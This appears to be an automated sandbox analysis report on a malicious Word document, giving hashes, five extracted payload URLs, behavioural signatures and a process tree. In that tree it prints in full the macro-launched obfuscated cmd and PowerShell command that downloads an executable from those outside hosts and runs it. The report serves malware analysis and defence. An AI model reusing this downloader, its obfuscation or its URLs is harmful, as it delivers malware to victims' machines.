Analysis
-
max time kernel
137s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2022 20:51
Behavioral task
behavioral1
Sample
25e20dba1686718cf283d2c42000451173871d93561d6b320295168643d53b1c.doc
Resource
win7-20220715-en
Behavioral task
behavioral2
Sample
25e20dba1686718cf283d2c42000451173871d93561d6b320295168643d53b1c.doc
Resource
win10v2004-20220722-en
General
-
Target
25e20dba1686718cf283d2c42000451173871d93561d6b320295168643d53b1c.doc
-
Size
82KB
-
MD5
3c0c13ebe452fa340ce659c07a5d670f
-
SHA1
786925a614d7856ac61e24d429adbcbe7faab6d2
-
SHA256
25e20dba1686718cf283d2c42000451173871d93561d6b320295168643d53b1c
-
SHA512
acf93a10760aea3ecbdbb82601f4ddb943f689b4e0fb7b861aa878a77d0a6d89fe50315a98dd98b3eae4612eebea7b7573d8096cb2c91f667711724beac8b332
Malware Config
Extracted
http://binsuloomgroup.com/wp-content/uploads/NefRZe_crlN072r_S
http://jcpersonaliza.com.br/g0i_4UcIJs
http://medicspoint.pk/5RKX6Ot_r3wyO
http://lailarahman.com/NLwq7z5_VIN4p7AR_00KDII
http://aryahospitalksh.com/h1rAZ_HEFn0J_E
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2908 3380 cmd.exe 75 -
Blocklisted process makes network request 3 IoCs
flow pid Process 17 3412 powershell.exe 22 3412 powershell.exe 23 3412 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 3380 WINWORD.EXE 3380 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3412 powershell.exe 3412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3412 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3380 WINWORD.EXE 3380 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 3380 WINWORD.EXE 3380 WINWORD.EXE 3380 WINWORD.EXE 3380 WINWORD.EXE 3380 WINWORD.EXE 3380 WINWORD.EXE 3380 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3380 wrote to memory of 4188 3380 WINWORD.EXE 77 PID 3380 wrote to memory of 4188 3380 WINWORD.EXE 77 PID 3380 wrote to memory of 2908 3380 WINWORD.EXE 78 PID 3380 wrote to memory of 2908 3380 WINWORD.EXE 78 PID 2908 wrote to memory of 3412 2908 cmd.exe 80 PID 2908 wrote to memory of 3412 2908 cmd.exe 80
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\25e20dba1686718cf283d2c42000451173871d93561d6b320295168643d53b1c.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3380 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:4188
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $NewMexico37='Lock29';$deposit24=new-object Net.WebClient;$AutomotiveAutomotiveBaby17='http://binsuloomgroup.com/wp-content/uploads/NefRZe_crlN072r_S@http://jcpersonaliza.com.br/g0i_4UcIJs@http://medicspoint.pk/5RKX6Ot_r3wyO@http://lailarahman.com/NLwq7z5_VIN4p7AR_00KDII@http://aryahospitalksh.com/h1rAZ_HEFn0J_E'.Split('@');$matrix4='Forward98';$array43 = '773';$InvestmentAccount1='Fresh78';$driver39=$env:public+'\'+$array43+'.exe';foreach($Opensource38 in $AutomotiveAutomotiveBaby17){try{$deposit24.DownloadFile($Opensource38, $driver39);$Handmade2='mesh46';If ((Get-Item $driver39).length -ge 80000) {Invoke-Item $driver39;$RefinedRubberBall12='taskforce34';break;}}catch{}}$iterate77='Buckinghamshire33';2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $NewMexico37='Lock29';$deposit24=new-object Net.WebClient;$AutomotiveAutomotiveBaby17='http://binsuloomgroup.com/wp-content/uploads/NefRZe_crlN072r_S@http://jcpersonaliza.com.br/g0i_4UcIJs@http://medicspoint.pk/5RKX6Ot_r3wyO@http://lailarahman.com/NLwq7z5_VIN4p7AR_00KDII@http://aryahospitalksh.com/h1rAZ_HEFn0J_E'.Split('@');$matrix4='Forward98';$array43 = '773';$InvestmentAccount1='Fresh78';$driver39=$env:public+'\'+$array43+'.exe';foreach($Opensource38 in $AutomotiveAutomotiveBaby17){try{$deposit24.DownloadFile($Opensource38, $driver39);$Handmade2='mesh46';If ((Get-Item $driver39).length -ge 80000) {Invoke-Item $driver39;$RefinedRubberBall12='taskforce34';break;}}catch{}}$iterate77='Buckinghamshire33';3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3412
-
-